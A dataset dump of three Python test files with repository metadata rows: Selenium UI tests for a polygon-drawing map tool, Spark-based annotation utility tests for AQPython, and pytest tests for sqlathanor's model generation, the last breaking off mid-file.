print("Select value Stad: " + select.first_selected_option.text)
assert(select.first_selected_option.text == "Stad")
# Push save polygon
driver.find_element_by_id("savePolygon").click()
# Search for new element
#elements = driver.find_elements_by_xpath('//a[@href="Skogcollapse"]')
elements = driver.find_elements_by_id("Stadcollapse")
print("Number of elements at adding: " + str(len(elements)))
assert(len(elements) == 1)
# Check if modal is shown
modal = driver.find_element_by_id("setPolygonCategoryModal")
print("Dialog is shown: " + str(modal.is_displayed()))
assert(modal.is_displayed() == False)
def test_clear_map(self):
print("************ Test clear map ****************")
sleeptime = 0
driver = self.driver
driver.get(path)
driver.maximize_window()
driver.find_element_by_id("btnOpenSidebar").click()
#element = driver.find_element_by_id("downloadPolygons")
# Check if modal is shown
modal = driver.find_element_by_id("setPolygonCategoryModal")
print("Dialog is shown: " + str(modal.is_displayed()))
assert(modal.is_displayed() == False)
# from wherever the mouse is, I move to the top left corner of the broswer
action = ActionChains(driver)
action.move_by_offset(500, 700)
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(0), int(100))
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(100), int(0))
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(0), int(-50))
action.click().perform()
action.click().perform()
time.sleep(2)
# Check if modal is shown
modal = driver.find_element_by_id("setPolygonCategoryModal")
print("Dialog is shown at close: " + str(modal.is_displayed()))
assert(modal.is_displayed() == True)
# Push button close -> Dialog close and polygon is gone
driver.find_element_by_id("closePolygonModal").click()
# Search for new element
elements = driver.find_elements_by_xpath('//div[@class="panel-heading"]')
print("Number of elements at close: " + str(len(elements)))
assert(len(elements) == 0)
# Draw new polygon
action.move_by_offset(0, 0)
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(0), int(100))
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(100), int(0))
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(0), int(-50))
action.click().perform()
action.click().perform()
time.sleep(2)
# Check if modal is shown
modal = driver.find_element_by_id("setPolygonCategoryModal")
print("Dialog is shown at close: " + str(modal.is_displayed()))
assert(modal.is_displayed() == True)
# Adding name to class
element = driver.find_element_by_id("newPolygonCategory")
element.clear()
element.send_keys("Skog")
# Push button add
driver.find_element_by_id("addClassName").click()
# Push save polygon
driver.find_element_by_id("savePolygon").click()
# Search for new element
elements = driver.find_elements_by_id("Skogcollapse")
print("Number of elements at adding: " + str(len(elements)))
assert(len(elements) == 1)
# Check if modal is shown
modal = driver.find_element_by_id("setPolygonCategoryModal")
print("Dialog is shown: " + str(modal.is_displayed()))
assert(modal.is_displayed() == False)
time.sleep(2)
# Click clear map
driver.find_element_by_id("clearMapButton").click()
# Search for new element
elements = driver.find_elements_by_id("Skogcollapse")
print("Number of class: " + str(len(elements)))
assert(len(elements) == 1)
elements = driver.find_elements_by_xpath('//button[@class="polygonRemoveButton btn btn-warning"]')
print("Number of polygons: " + str(len(elements)))
assert(len(elements) == 0)
def test_download_polygons(self):
print("************ Test download polygons ****************")
driver = self.driver
driver.get(path)
driver.maximize_window()
sleeptime = 0
# Open sidebar
driver.find_element_by_id("btnOpenSidebar").click()
# from wherever the mouse is, I move to the top left corner of the browser
action = ActionChains(driver)
action.move_by_offset(500, 700)
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(0), int(100))
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(100), int(0))
action.click().perform()
action.click().perform()
time.sleep(1)
# Adding name to class
element = driver.find_element_by_id("newPolygonCategory")
element.clear()
element.send_keys("Skog")
# Push button add
driver.find_element_by_id("addClassName").click()
# Push save polygon
driver.find_element_by_id("savePolygon").click()
# Search for new element
elements = driver.find_elements_by_id("Skogcollapse")
print("Number of elements at adding: " + str(len(elements)))
assert(len(elements) == 1)
# Check if download modal is shown
modal = driver.find_element_by_id("downloadPolygonsModal")
print("Dialog download: " + str(modal.is_displayed()))
assert(modal.is_displayed() == False)
time.sleep(1)
# Push download button
driver.find_element_by_id("downloadPolygons").click()
# Check if download modal is shown
modal = driver.find_element_by_id("downloadPolygonsModal")
print("Dialog download: " + str(modal.is_displayed()))
assert(modal.is_displayed() == True)
# Adding filename
element = driver.find_element_by_id("geoJsonFileName")
element.clear()
element.send_keys("Test_download")
time.sleep(1)
# Click on close
driver.find_element_by_id("btnClosePolygonDownload").click()
time.sleep(1)
# Check if download modal is shown
modal = driver.find_element_by_id("downloadPolygonsModal")
print("Dialog download: " + str(modal.is_displayed()))
assert(modal.is_displayed() == False)
time.sleep(1)
# Push download button
driver.find_element_by_id("downloadPolygons").click()
time.sleep(1)
# Check if input is the same
element = driver.find_element_by_id("geoJsonFileName")
print("Input text: " + element.get_attribute('value'))
assert(element.get_attribute('value') == "Test_download")
# Push save file
driver.find_element_by_id("savePolygonsBtn").click()
time.sleep(1)
# TODO Check if savefile dialog is shown
time.sleep(sleeptime)
#assert(element.first_selected_option.text == "adagrad")
def test_attributes(self):
print("************ Test attributes ****************")
sleeptime = 1
driver = self.driver
driver.get(path)
driver.maximize_window()
# Open sidebar
driver.find_element_by_id("btnOpenSidebar").click()
#Check length of attribute inputLists
elements = driver.find_elements_by_xpath('//div[@class="col-12 attributeListDiv"]')
print("Number of elements: " + str(len(elements)))
assert(len(elements) == 0)
# from wherever the mouse is, I move to the top left corner of the broswer
action = ActionChains(driver)
action.move_by_offset(500, 700)
action.click().perform()
action = ActionChains(driver)
action.move_by_offset(int(0), int(100))
action.click().perform()
action = ActionChains(driver)
action.move_by_offset(int(100), int(0))
action.click().perform()
action = ActionChains(driver)
action.move_by_offset(int(0), int(-50))
action.click().perform()
action.click().perform()
time.sleep(2)
# Adding training area
element = driver.find_element_by_id("checkTrainPolygon")
element.click()
print("Training checkbox is checked: " + str(element.is_selected()))
assert(element.is_selected())
# Push save polygon
driver.find_element_by_id("savePolygon").click()
time.sleep(sleeptime)
#Go to NetworkTab
driver.find_element_by_id("tabSidebarNetwork").click()
#Open attributes
driver.find_element_by_id("displayAttributesButton").click()
time.sleep(sleeptime)
#Check length of attribute inputLists
elements = driver.find_elements_by_xpath('//div[@class="col-12 attributeListDiv"]')
print("Number of elements: " + str(len(elements)))
assert(len(elements) == 23)
#Check all attributes
#element = driver.find_element_by_id("checkboxAllAttributes")
element = driver.find_element_by_class_name("attributesAllCheckbox")
element.click()
time.sleep(sleeptime)
print("Attribute mastercheckbox is checked: " + str(element.is_selected()))
assert(element.is_selected())
driver.find_element_by_id("btnSaveAttributes").click()
time.sleep(sleeptime)
def test_networksettings_download(self):
print("************ Test download networksettings ****************")
driver = self.driver
driver.get(path)
#Open sidebar
driver.find_element_by_id("btnOpenSidebar").click()
#Go to NetworkTab
driver.find_element_by_id("tabSidebarNetwork").click()
#Add layers
driver.find_element_by_id("openAddLayerModal").click()
time.sleep(1)
driver.find_element_by_id("units").send_keys("2")
driver.find_element_by_id("addLayer").click()
#Set epochs
element = driver.find_element_by_id("epochsChoice")
element.clear()
element.send_keys("10")
#Set Learning Rate
element = driver.find_element_by_id("learningRate")
element.clear()
element.send_keys("0.1")
#Set loss Choice
#element = driver.find_element_by_id("lossChoice")
#element.clear()
#element.send_keys("SeleniumTest")
#Set Optimizer
element = Select(driver.find_element_by_id('optimizerChoice'))
element.select_by_visible_text("adagrad")
#Download settings
driver.find_element_by_id("saveNetwork").click()
time.sleep(1)
driver.find_element_by_id("jsonFileName").send_keys("seleniumTest")
driver.find_element_by_id("btnSaveNetworkModal").click()
time.sleep(2)
def tearDown(self):
self.driver.quit()
if __name__ == "__main__":
unittest.main()
| 35.285992 | 106 | 0.627447 | 2,066 | 18,137 | 5.315586 | 0.099226 | 0.073757 | 0.108359 | 0.121107 | 0.830632 | 0.801402 | 0.774085 | 0.751594 | 0.748953 | 0.695046 | 0 | 0.01136 | 0.247726 | 18,137 | 513 | 107 | 35.354776 | 0.793536 | 0.122236 | 0 | 0.767584 | 0 | 0 | 0.153069 | 0.025259 | 0 | 0 | 0 | 0.001949 | 0.094801 | 1 | 0.027523 | false | 0 | 0.027523 | 0 | 0.058104 | 0.116208 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
67146c2b7b35337bff4d0e1a5422676bbf64f3cf | 15,807 | py | Python | tests/test_utilities.py | elsevierlabs-os/AnnotationQueryPython | b672aeb076e680990c22edb71d17c1821c5148a4 | [
"BSD-3-Clause"
] | 4 | 2019-10-15T08:21:00.000Z | 2020-06-22T14:58:57.000Z | tests/test_utilities.py | elsevierlabs-os/AnnotationQueryPython | b672aeb076e680990c22edb71d17c1821c5148a4 | [
"BSD-3-Clause"
] | 1 | 2019-09-17T14:51:15.000Z | 2019-09-17T14:51:15.000Z | tests/test_utilities.py | elsevierlabs-os/AnnotationQueryPython | b672aeb076e680990c22edb71d17c1821c5148a4 | [
"BSD-3-Clause"
] | 1 | 2019-10-29T14:27:12.000Z | 2019-10-29T14:27:12.000Z | # -*- coding: utf-8 -*-
import unittest
from AQPython.Utilities import *
from AQPython.Query import *
import pyspark
from pyspark.sql import Row
class UtilitiesTestSuite(unittest.TestCase):
@classmethod
def setUpClass(cls):
spark = pyspark.sql.SparkSession.builder \
.getOrCreate()
spark.conf.set("spark.sql.shuffle.partitions",4)
if os.path.exists("/tmp/S0022314X13001777"):
os.remove("/tmp/S0022314X13001777")
# Test GetAQAnnotations count
def test_Utilities1(self):
annots = GetAQAnnotations(spark.read.parquet("./tests/resources/genia/"),
["orig", "lemma", "pos", "excludes"],
["lemma", "pos"],
["orig", "lemma"])
self.assertEquals(4066, annots.count())
# Test GetAQAnnotations annotation
def test_Utilities2(self):
annots = GetAQAnnotations(spark.read.parquet("./tests/resources/genia/"),
["orig", "lemma", "pos", "excludes"],
["lemma", "pos"],
["orig", "lemma"]) \
.orderBy(["docId", "startOffset","endOffset","annotType"])
result = annots.select("annotId","annotSet","annotType","docId","endOffset","properties","startOffset").collect()[0]
expected = Row(docId='S0022314X13001777', annotSet='ge', annotType='word', startOffset=18546, endOffset=18551, annotId=3, properties={'lemma': 'sylow', 'pos': 'jj', 'orig': 'Sylow'})
self.assertEquals(result.docId,expected.docId)
self.assertEquals(result.annotSet,expected.annotSet)
self.assertEquals(result.annotType,expected.annotType)
self.assertEquals(result.startOffset,expected.startOffset)
self.assertEquals(result.endOffset,expected.endOffset)
self.assertEquals(result.annotId,expected.annotId)
self.assertEquals(result.properties,expected.properties)
# Test GetAQAnnotations property wildcard
def test_Utilities3(self):
annots = GetAQAnnotations(spark.read.parquet("./tests/resources/genia/"),
["*"]) \
.orderBy(["docId", "startOffset","endOffset","annotType"])
result = annots.select("annotId","annotSet","annotType","docId","endOffset","properties","startOffset").collect()[0]
expected = Row(docId='S0022314X13001777', annotSet='ge', annotType='word', startOffset=18546, endOffset=18551, annotId=3, properties={'lemma': 'sylow', 'origAnnotID': '4055', 'pos': 'JJ', 'orig': 'Sylow', 'tokidx': '1', 'parentId': '4054'})
self.assertEquals(result.docId,expected.docId)
self.assertEquals(result.annotSet,expected.annotSet)
self.assertEquals(result.annotType,expected.annotType)
self.assertEquals(result.startOffset,expected.startOffset)
self.assertEquals(result.endOffset,expected.endOffset)
self.assertEquals(result.annotId,expected.annotId)
self.assertEquals(result.properties,expected.properties)
# Test GetAQAnnotations lower case wildcard
def test_Utilities4(self):
annots = GetAQAnnotations(spark.read.parquet("./tests/resources/genia/"),
["*"],
["*"]) \
.orderBy(["docId", "startOffset","endOffset","annotType"])
result = annots.select("annotId","annotSet","annotType","docId","endOffset","properties","startOffset").collect()[0]
expected = Row(docId='S0022314X13001777', annotSet='ge', annotType='word', startOffset=18546, endOffset=18551, annotId=3, properties={'lemma': 'sylow', 'origAnnotID': '4055', 'pos': 'jj', 'orig': 'sylow', 'tokidx': '1', 'parentId': '4054'})
self.assertEquals(result.docId,expected.docId)
self.assertEquals(result.annotSet,expected.annotSet)
self.assertEquals(result.annotType,expected.annotType)
self.assertEquals(result.startOffset,expected.startOffset)
self.assertEquals(result.endOffset,expected.endOffset)
self.assertEquals(result.annotId,expected.annotId)
self.assertEquals(result.properties,expected.properties)
# Test GetAQAnnotations url decode wildcard
def test_Utilities5(self):
annots = GetAQAnnotations(spark.read.parquet("./tests/resources/genia/"),
["*"],
[],
['*"']) \
.orderBy(["docId", "startOffset","endOffset","annotType"])
result = annots.select("annotId","annotSet","annotType","docId","endOffset","properties","startOffset").collect()[0]
expected = Row(docId='S0022314X13001777', annotSet='ge', annotType='word', startOffset=18546, endOffset=18551, annotId=3, properties={'lemma': 'sylow', 'origAnnotID': '4055', 'pos': 'JJ', 'orig': 'Sylow', 'tokidx': '1', 'parentId': '4054'})
self.assertEquals(result.docId,expected.docId)
self.assertEquals(result.annotSet,expected.annotSet)
self.assertEquals(result.annotType,expected.annotType)
self.assertEquals(result.startOffset,expected.startOffset)
self.assertEquals(result.endOffset,expected.endOffset)
self.assertEquals(result.annotId,expected.annotId)
self.assertEquals(result.properties,expected.properties)
# Test GetCATAnnotations count
def test_Utilities6(self):
annots = GetAQAnnotations(spark.read.parquet("./tests/resources/genia/"),
["orig", "lemma", "pos", "excludes"],
["lemma", "pos"],
["orig", "lemma"])
catAnnots = GetCATAnnotations(annots,["orig", "lemma", "pos"],["orig", "lemma"])
self.assertEquals(4066, catAnnots.count())
# Test GetCATAnnotations annotation
def test_Utilities7(self):
annots = GetAQAnnotations(spark.read.parquet("./tests/resources/genia/"),
["orig", "lemma", "pos", "excludes"],
["lemma", "pos"],
["orig", "lemma"])
catAnnots = GetCATAnnotations(annots,["orig", "lemma", "pos"],["orig", "lemma"]) \
.orderBy(["docId", "startOffset","endOffset"])
result = catAnnots.select("annotId","annotSet","annotType","docId","endOffset","other","startOffset").collect()[3]
expected = Row(docId='S0022314X13001777', annotSet='ge', annotType='word', startOffset=18552, endOffset=18560, annotId=4, other='lemma=p-group&pos=nns&orig=p-groups')
self.assertEquals(result.docId,expected.docId)
self.assertEquals(result.annotSet,expected.annotSet)
self.assertEquals(result.annotType,expected.annotType)
self.assertEquals(result.startOffset,expected.startOffset)
self.assertEquals(result.endOffset,expected.endOffset)
self.assertEquals(result.annotId,expected.annotId)
self.assertEquals(result.other,expected.other)
# Test GetCATAnnotations property wildcard
def test_Utilities8(self):
annots = GetAQAnnotations(spark.read.parquet("./tests/resources/genia/"),
["orig", "lemma", "pos", "excludes"],
["lemma", "pos"],
["orig", "lemma"])
catAnnots = GetCATAnnotations(annots,["*"]) \
.orderBy(["docId", "startOffset","endOffset"])
result = catAnnots.select("annotId","annotSet","annotType","docId","endOffset","other","startOffset").collect()[3]
expected = Row(docId='S0022314X13001777', annotSet='ge', annotType='word', startOffset=18552, endOffset=18560, annotId=4, other='lemma=p-group&pos=nns&orig=p-groups')
self.assertEquals(result.docId,expected.docId)
self.assertEquals(result.annotSet,expected.annotSet)
self.assertEquals(result.annotType,expected.annotType)
self.assertEquals(result.startOffset,expected.startOffset)
self.assertEquals(result.endOffset,expected.endOffset)
self.assertEquals(result.annotId,expected.annotId)
self.assertEquals(result.other,expected.other)
# Test GetCATAnnotations encode wildcard
def test_Utilities9(self):
annots = GetAQAnnotations(spark.read.parquet("./tests/resources/genia/"),
["orig", "lemma", "pos", "excludes"],
["lemma", "pos"],
["orig", "lemma"])
catAnnots = GetCATAnnotations(annots,["*"],["*"]) \
.orderBy(["docId", "startOffset","endOffset"])
result = catAnnots.select("annotId","annotSet","annotType","docId","endOffset","other","startOffset").collect()[3]
expected = Row(docId='S0022314X13001777', annotSet='ge', annotType='word', startOffset=18552, endOffset=18560, annotId=4, other='lemma=p-group&pos=nns&orig=p-groups')
self.assertEquals(result.docId,expected.docId)
self.assertEquals(result.annotSet,expected.annotSet)
self.assertEquals(result.annotType,expected.annotType)
self.assertEquals(result.startOffset,expected.startOffset)
self.assertEquals(result.endOffset,expected.endOffset)
self.assertEquals(result.annotId,expected.annotId)
self.assertEquals(result.other,expected.other)
# Test Hydrate missing annotation file
def test_Utilities10(self):
annots = GetAQAnnotations(spark.read.parquet("./tests/resources/genia/"),
["orig", "lemma", "pos", "excludes"],
["lemma", "pos"],
["orig", "lemma"])
sentenceAnnots = FilterType(annots, "sentence").limit(1)
hydratedAnnots = Hydrate(sentenceAnnots,"./tests/resources/junk/")
result = hydratedAnnots.select("annotId","annotSet","annotType","docId","endOffset","properties","startOffset").collect()[0]
#result = hydratedAnnots.select("annotId","annotSet","annotType","docId","endOffset","startOffset").collect()[0]
expected = Row(docId='S0022314X13001777', annotSet='ge', annotType='sentence', startOffset=18546, endOffset=18607, annotId=1, properties={})
#expected = Row(docId='S0022314X13001777', annotSet='ge', annotType='sentence', startOffset=18546, endOffset=18607, annotId=1)
self.assertEquals(result.docId,expected.docId)
self.assertEquals(result.annotSet,expected.annotSet)
self.assertEquals(result.annotType,expected.annotType)
self.assertEquals(result.startOffset,expected.startOffset)
self.assertEquals(result.endOffset,expected.endOffset)
self.assertEquals(result.annotId,expected.annotId)
# Test Hydrate sentence
def test_Utilities11(self):
annots = GetAQAnnotations(spark.read.parquet("./tests/resources/genia/"),
["orig", "lemma", "pos", "excludes"],
["lemma", "pos"],
["orig", "lemma"])
sentenceAnnots = FilterType(annots, "sentence")
hydratedAnnots = Hydrate(sentenceAnnots,"./tests/resources/str/")
hydratedAnnots.count()
result = hydratedAnnots.select("annotId","annotSet","annotType","docId","endOffset","properties","startOffset").collect()[0]
expected = Row(docId='S0022314X13001777', annotSet='ge', annotType='sentence', startOffset=18546, endOffset=18607, annotId=1, properties={'text': 'Sylow p-groups of polynomial permutations on the integers mod'})
self.assertEquals(result.docId,expected.docId)
self.assertEquals(result.annotSet,expected.annotSet)
self.assertEquals(result.annotType,expected.annotType)
self.assertEquals(result.startOffset,expected.startOffset)
self.assertEquals(result.endOffset,expected.endOffset)
self.assertEquals(result.annotId,expected.annotId)
self.assertEquals(result.properties,expected.properties)
# Test Hydrate sentence with excludes
def test_Utilities12(self):
annots = GetAQAnnotations(spark.read.parquet("./tests/resources/genia/"),
["orig", "lemma", "pos", "excludes"],
["lemma", "pos"],
["orig", "lemma"])
sentenceAnnots = FilterType(annots, "sentence")
hydratedAnnots = Hydrate(sentenceAnnots,"./tests/resources/str/")
result = hydratedAnnots.select("annotId","annotSet","annotType","docId","endOffset","properties","startOffset").collect()[8]
expected = Row(docId='S0022314X13001777', annotSet='ge', annotType='sentence', startOffset=20490, endOffset=20777, annotId=256, properties={'excludes': '2872,om,mml:math,20501,20510|2894,om,mml:math,20540,20546|2907,om,mml:math,20586,20590|2913,om,mml:math,20627,20630|2923,om,mml:math,20645,20651|2933,om,mml:math,20718,20721', 'text': 'A function arising from a polynomial in or, equivalently, from a polynomial in , is called a polynomial function on . We denote by the monoid with respect to composition of polynomial functions on . By monoid, we mean semigroup with an identity element.'})
self.assertEquals(result.docId,expected.docId)
self.assertEquals(result.annotSet,expected.annotSet)
self.assertEquals(result.annotType,expected.annotType)
self.assertEquals(result.startOffset,expected.startOffset)
self.assertEquals(result.endOffset,expected.endOffset)
self.assertEquals(result.annotId,expected.annotId)
self.assertEquals(result.properties,expected.properties)
# Test Hydrate sentence without excludes
def test_Utilities13(self):
annots = GetAQAnnotations(spark.read.parquet("./tests/resources/genia/"),
["orig", "lemma", "pos", "excludes"],
["lemma", "pos"],
["orig", "lemma"])
sentenceAnnots = FilterType(annots, "sentence")
hydratedAnnots = Hydrate(sentenceAnnots,"./tests/resources/str/",False)
result = hydratedAnnots.select("annotId","annotSet","annotType","docId","endOffset","properties","startOffset").collect()[8]
expected = Row(docId='S0022314X13001777', annotSet='ge', annotType='sentence', startOffset=20490, endOffset=20777, annotId=256, properties={'excludes': '2872,om,mml:math,20501,20510|2894,om,mml:math,20540,20546|2907,om,mml:math,20586,20590|2913,om,mml:math,20627,20630|2923,om,mml:math,20645,20651|2933,om,mml:math,20718,20721', 'text': 'A function g:Zpn→Zpn arising from a polynomial in Zpn[x] or, equivalently, from a polynomial in Z[x], is called a polynomial function on Zpn. We denote by (Fn,∘) the monoid with respect to composition of polynomial functions on Zpn. By monoid, we mean semigroup with an identity element.'})
self.assertEquals(result.docId,expected.docId)
self.assertEquals(result.annotSet,expected.annotSet)
self.assertEquals(result.annotType,expected.annotType)
self.assertEquals(result.startOffset,expected.startOffset)
self.assertEquals(result.endOffset,expected.endOffset)
self.assertEquals(result.annotId,expected.annotId)
self.assertEquals(result.properties,expected.properties) | 64.782787 | 636 | 0.626431 | 1,474 | 15,807 | 6.710312 | 0.122795 | 0.126175 | 0.169043 | 0.040744 | 0.90092 | 0.891113 | 0.878981 | 0.874937 | 0.868466 | 0.868466 | 0 | 0.047839 | 0.23167 | 15,807 | 244 | 637 | 64.782787 | 0.766406 | 0.045613 | 0 | 0.769231 | 0 | 0.020513 | 0.220372 | 0.061314 | 0 | 0 | 0 | 0 | 0.4 | 1 | 0.071795 | false | 0 | 0.025641 | 0 | 0.102564 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6753e8c9cbe788558875ef42271d3641d5344181 | 36,534 | py | Python | tests/test_model_generation.py | edupo/sqlathanor | a5cfd349d092b25a3ffb3950b996b13878e1db17 | [
"MIT"
] | 101 | 2018-07-21T00:20:59.000Z | 2022-02-09T21:33:09.000Z | tests/test_model_generation.py | edupo/sqlathanor | a5cfd349d092b25a3ffb3950b996b13878e1db17 | [
"MIT"
] | 85 | 2018-06-16T02:15:08.000Z | 2022-02-24T14:57:24.000Z | tests/test_model_generation.py | edupo/sqlathanor | a5cfd349d092b25a3ffb3950b996b13878e1db17 | [
"MIT"
] | 6 | 2018-07-25T09:51:02.000Z | 2022-02-24T14:04:27.000Z | # -*- coding: utf-8 -*-
"""
***********************************
tests.test_model_generation
***********************************
Tests for functions which programmatically generate declarative models.
"""
from datetime import datetime
import pytest
import simplejson as json
import yaml
from sqlalchemy.types import Integer, Text, Float, DateTime, Date, Time, Boolean
from validator_collection import checkers
from sqlathanor.declarative import generate_model_from_dict, generate_model_from_json, \
generate_model_from_yaml, generate_model_from_csv
from sqlathanor.attributes import AttributeConfiguration
from sqlathanor.errors import UnsupportedValueTypeError, CSVStructureError
from tests.fixtures import check_input_file, input_files
# pylint: disable=line-too-long
def test_func():
pass
@pytest.mark.parametrize('input_data, tablename, primary_key, serialization_config, skip_nested, default_to_str, type_mapping, base_model_attrs, expected_types, error', [
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time(),
'nested1': ['test', 'test2']
}, 'test_table', 'int1', None, True, False, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Time)], None),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time(),
'nested1': ['test', 'test2']
}, 'test_table', 'int1', None, False, True, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Time),
('nested1', Text)], None),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time(),
'nested1': ['test', 'test2']
}, 'test_table', 'int1', None, False, False, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Time)], UnsupportedValueTypeError),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time(),
'nested1': ['test', 'test2'],
'callable1': test_func
}, 'test_table', 'int1', None, True, False, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Time)], UnsupportedValueTypeError),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time(),
'nested1': ['test', 'test2']
}, 'test_table', 'int1', [AttributeConfiguration(name = 'bool1', supports_csv = False, supports_json = True, supports_yaml = True, supports_dict = True)],
True, False, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Time)], None),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time(),
'nested1': ['test', 'test2']
}, 'test_table', 'int1', None, True, False, {'float': Text}, None, [('int1', Integer),
('string1', Text),
('float1', Text),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Time)], None),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time(),
'nested1': ['test', 'test2']
}, 'test_table', 'int1', None, True, False, None, {'test_attr': 123}, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Time)], None),
])
def test_generate_model_from_dict(input_data,
tablename,
primary_key,
serialization_config,
skip_nested,
default_to_str,
type_mapping,
base_model_attrs,
expected_types,
error):
# pylint: disable=no-member,line-too-long
if error:
with pytest.raises(error):
result = generate_model_from_dict(input_data,
tablename = tablename,
primary_key = primary_key,
serialization_config = serialization_config,
skip_nested = skip_nested,
default_to_str = default_to_str,
type_mapping = type_mapping,
base_model_attrs = base_model_attrs)
else:
result = generate_model_from_dict(input_data,
tablename = tablename,
primary_key = primary_key,
serialization_config = serialization_config,
skip_nested = skip_nested,
default_to_str = default_to_str,
type_mapping = type_mapping,
base_model_attrs = base_model_attrs)
assert hasattr(result, 'to_json') is True
assert hasattr(result, 'new_from_json') is True
assert hasattr(result, 'update_from_json') is True
assert hasattr(result, '__serialization__') is True
assert result.__tablename__ == tablename
for item in expected_types:
assert hasattr(result, item[0]) is True
attribute = getattr(result, item[0], None)
assert isinstance(attribute.type, item[1]) is True
if serialization_config:
for item in serialization_config:
assert hasattr(result, item.name) is True
assert result.get_attribute_serialization_config(item.name) == item
else:
for item in expected_types:
assert hasattr(result, item[0]) is True
assert result.get_attribute_serialization_config(item[0]).supports_csv == (True, True)
assert result.get_attribute_serialization_config(item[0]).supports_json == (True, True)
assert result.get_attribute_serialization_config(item[0]).supports_yaml == (True, True)
assert result.get_attribute_serialization_config(item[0]).supports_dict == (True, True)
if base_model_attrs:
for key in base_model_attrs:
assert hasattr(result, key) is True
assert getattr(result, key) == base_model_attrs[key]
@pytest.mark.parametrize('input_data, tablename, primary_key, serialization_config, skip_nested, default_to_str, type_mapping, base_model_attrs, expected_types, error', [
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time().isoformat(),
'nested1': ['test', 'test2']
}, 'test_table0', 'int1', None, True, False, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Text)], None),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time().isoformat(),
'nested1': ['test', 'test2']
}, 'test_table1', 'int1', None, False, True, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Text),
('nested1', Text)], None),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time().isoformat(),
'nested1': ['test', 'test2']
}, 'test_table2', 'int1', None, False, False, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Text)], UnsupportedValueTypeError),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time().isoformat(),
'nested1': ['test', 'test2']
}, 'test_table3', 'int1', [AttributeConfiguration(name = 'bool1', supports_csv = False, supports_json = True, supports_yaml = True, supports_dict = True)],
True, False, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Text)], None),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time().isoformat(),
'nested1': ['test', 'test2']
}, 'test_table4', 'int1', None, True, False, {'float': Text}, None, [('int1', Integer),
('string1', Text),
('float1', Text),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
